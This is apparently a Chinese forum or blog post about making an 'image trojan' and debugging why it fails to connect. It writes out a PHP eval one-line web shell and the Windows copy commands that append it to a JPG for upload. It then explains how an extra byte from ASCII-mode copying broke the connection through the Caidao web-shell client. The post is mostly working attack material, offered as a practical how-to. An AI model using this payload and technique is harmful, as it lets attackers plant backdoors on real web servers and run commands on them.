制作图片木马中的问题
问题 :copy命令制作图片木马后,菜刀无法连接
1.执行步骤:
一张普通图片:1.jpg
php版本一句话木马,保存为 1.php,代码如下:
<?php @eval($_POST['pass']);?>
制作图片木马,将图片文件和php文件合并为2.jpg,命令如下:
copy 1.jpg/b+1.php/a 2.jpg
其中 /b代表以二进制编码打开文件,/a代表以ASCII码编码打开文件
上传成功后,用菜刀连接,弹出成功获取图片,未拿到webshell。
2.问题排查
用HxD hex editor打开制作的图片木马 2.jpg ,如下图。发现,一句话木马已经拼接到尾部,但是多了一个符号 ‘.’(红色的点)。
去掉多余的符号后,再次上传就ok了。
3.问题解决
修改copy命令如下:
copy 1.jpg/b+1.php/b 2.jpg
再次用HxD hex editor打开修改后的图片木马,多余的点已消失。
但此时的图片木马无法连接菜刀
然而当使用如下命令时:
copy 1.jpg/a+1.php/a 2.jpg
还是会出现多余的点,猜测是因为ASCII编码方式导致的,希望有大神可以解释一下这个现象。